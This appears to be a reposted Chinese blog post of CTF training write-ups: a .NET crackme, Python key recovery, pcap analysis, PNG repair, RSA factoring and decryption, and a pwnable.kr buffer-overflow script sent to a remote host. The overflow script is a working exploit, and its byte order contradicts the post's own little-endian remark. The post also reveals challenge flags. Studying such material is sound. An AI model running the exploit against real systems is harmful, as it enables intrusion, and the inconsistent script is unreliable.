1:(转载)
C语言规定main函数的参数只能有两个,习惯上这两个参数写为argc和argv。因此,main函数的函数头可写为: main (argc,argv)C语言还规定argc(第一个形参)必须是整型变量,argv( 第二个形参)必须是指向字符串的指针数组。加上形参说明后,main函数的函数头应写为:
int main (int argc,char *argv[]){…}或者
int main (int argc,char **argv){…}
其中第一个表示参数的个数;第二个参数中argv[0]为自身运行目录路径和程序名,argv[1]指向第一个参数、argv[2]指向第二个参数……
ISC2016训练赛——phrackCTF:Classical CrackMe
PEID检测到.NET文件。
用IL Spy打开,搜索字符串“注册成功”,找到对应函数
得到解密后的base字符串(flag):PCTF{Ea5y_Do_Net_Cr4ck3r}
因为没学过.NET,也就只能这样做了!
----------------------------------------------------------------------------------------------------------
ISC2016训练赛——phrackCTF;FindKey
给出的文件通过
判断出需要通过python反汇编,使用Easy Python Decompiler反汇编之后得到python源码,脚本如下
lookup = [196,
153,
149,
206,
17,
221,
10,
217,
167,
18,
36,
135,
103,
61,
111,
31,
92,
152,
21,
228,
105,
191,
173,
41,
2,
245,
23,
144,
1,
246,
89,
178,
182,
119,
38,
85,
48,
226,
165,
241,
166,
214,
71,
90,
151,
3,
109,
169,
150,
224,
69,
156,
158,
57,
181,
29,
200,
37,
51,
252,
227,
93,
65,
82,
66,
80,
170,
77,
49,
177,
81,
94,
202,
107,
25,
73,
148,
98,
129,
231,
212,
14,
84,
121,
174,
171,
64,
180,
233,
74,
140,
242,
75,
104,
253,
44,
39,
87,
86,
27,
68,
22,
55,
76,
35,
248,
96,
5,
56,
20,
161,
213,
238,
220,
72,
100,
247,
8,
63,
249,
145,
243,
155,
222,
122,
32,
43,
186,
0,
102,
216,
126,
15,
42,
115,
138,
240,
147,
229,
204,
117,
223,
141,
159,
131,
232,
124,
254,
60,
116,
46,
113,
79,
16,
128,
6,
251,
40,
205,
137,
199,
83,
54,
188,
19,
184,
201,
110,
255,
26,
91,
211,
132,
160,
168,
154,
185,
183,
244,
78,
33,
123,
28,
59,
12,
210,
218,
47,
163,
215,
209,
108,
235,
237,
118,
101,
24,
234,
106,
143,
88,
9,
136,
95,
30,
193,
176,
225,
198,
197,
194,
239,
134,
162,
192,
11,
70,
58,
187,
50,
67,
236,
230,
13,
99,
190,
208,
207,
7,
53,
219,
203,
62,
114,
127,
125,
164,
179,
175,
112,
172,
250,
133,
130,
52,
189,
97,
146,
34,
157,
120,
195,
45,
4,
142,
139]
pwda = [188,
155,
11,
58,
251,
208,
204,
202,
150,
120,
206,
237,
114,
92,
126,
6,
42]
pwdb = [53,
222,
230,
35,
67,
248,
226,
216,
17,
209,
32,
2,
181,
200,
171,
60,
108]
flag=''
for a in range(17):
for b in range(255):
if b + pwda[a] & 255 == lookup[a + pwdb[a]]:
flag+=chr(b)
break
flag=flag[::-1]
print flag
-------------------------------------------------------------------------------------------------
ISC2016训练赛——phrackCTF:SCAN
据说原来的题目提示是ping扫描。不然根据i春秋上的题目描述就跳进大坑了!
一道简单的杂项题
用wireshark打开.log文件,搜索icmp,可以看到有4个不同的ip在扫描192.168.0.9
其中包编号为155989的是第四次扫描.用sha256对155989加密后即可获得flag!
-------------------------------------------------------------------------------------------------
ISC2016训练赛——phrackCTF:Class10
很简单的一道杂项题,用文本打开class10文件,然后发现了一个很有特点的字符串IHDR,那应该是png格式的文件,查看文件头,发现给破坏了,所以就用winhex补全,补全打开后得下图!
PCTF{SHIELD_Class_10_C4n_You_find_the_fl4g?}
结果flag错误,不知道什么意思?
----------------------------------------------------------------------------------------
ISC2016训练赛——phrackCTF:medium RSA
第一次做密码学的题目
转载一波wp吧!
1、解压得到两个文件【flag.enc】和【pubkey.pem】,其中【flag.enc】从文件名含有flag可以判断是加密后的密文,【pubkey.pem】是公钥文件,通过公钥文件可以得到e和n;所以解题思路就是考虑对n进行分解,如果能够成功分解,得到p、q,则可以计算参数d,进而生成私钥,有了私钥,就可以对密文【flag.enc】进行解密。
2、通过openssl对公钥文件【pubkey.pem】进行分解,使用命令【openssl rsa -pubin -text -modulus -in warmup -in pubkey.pem】,得到e=65537 (0x10001),Modulus即为n=C2636AE5C3D8E43FFB97AB09028F1AAC6C0BF6CD3D70EBCA281BFFE97FBE30DD
3、通过python将n从16进制转换为10进制,得到87924348264132406875276140514499937145050893665602592992418171647042491658461
>>> a=0xC2636AE5C3D8E43FFB97AB09028F1AAC6C0BF6CD3D70EBCA281BFFE97FBE30DD
>>> print(a)
87924348264132406875276140514499937145050893665602592992418171647042491658461
4、使用yafu对n进行因数分解,得到p、q分别为275127860351348928173285174381581152299、319576316814478949870590164193048041239
F:\\yafu>yafu-Win32.exe factor(87924348264132406875276140514499937145050893665602592992418171647042491658461)
fac: factoring 87924348264132406875276140514499937145050893665602592992418171647042491658461
fac: using pretesting plan: normal
fac: no tune info: using qs/gnfs crossover of 95 digits
starting SIQS on c77: 87924348264132406875276140514499937145050893665602592992418171647042491658461
==== sieving in progress (1 thread): 36224 relations needed ====
==== Press ctrl-c to abort and save state ====
SIQS elapsed time = 4.4030 seconds.
Total factoring time = 4.5505 seconds
***factors found***
P39 = 275127860351348928173285174381581152299
P39 = 319576316814478949870590164193048041239
ans = 1
5、至此,各个参数已经求得如下,可以编写代码获得私钥,再用私钥解密密文,得到明文信息
p = 275127860351348928173285174381581152299
q = 319576316814478949870590164193048041239
n = 87924348264132406875276140514499937145050893665602592992418171647042491658461
e = 65537
6、利用python实现,代码如下
import gmpy2import rsa
p = 275127860351348928173285174381581152299
q = 319576316814478949870590164193048041239
n = 87924348264132406875276140514499937145050893665602592992418171647042491658461
e = 65537
d = int(gmpy2.invert(e , (p-1) * (q-1)))
privatekey = rsa.PrivateKey(n , e , d , p , q) #根据已知参数,计算私钥
with open("E:/04 CTF/i春秋/ISC2016训练赛——phrackCTF/Crypto-medium RSA/mediumRSA/flag.enc" , "rb") as f:
print(rsa.decrypt(f.read(), privatekey).decode()) #使用私钥对密文进行解密,并打印
还不会RSA算法的可以看一下这个博客,个人觉得讲解的很好,很简单!
https://blog.csdn.net/dbs1215/article/details/48953589
还有yafu的使用方法
https://www.cnblogs.com/pcat/p/7508205.html
--------------------------------------------------------
第三题:bof
pwn:http://pwnable.kr/play.php
脚本如下,唯一一个难点是它是小端的
from pwn import *
io=remote("17.17.0.2",30001)
payload='A'*4*13
payload+=chr(0xCA)+chr(0xFE)+chr(0xBA)+chr(0xBE)
io.send(payload)
io.interactive()
小端的每个字节反序排放就行了!
-----------------------------------------------------------------------------------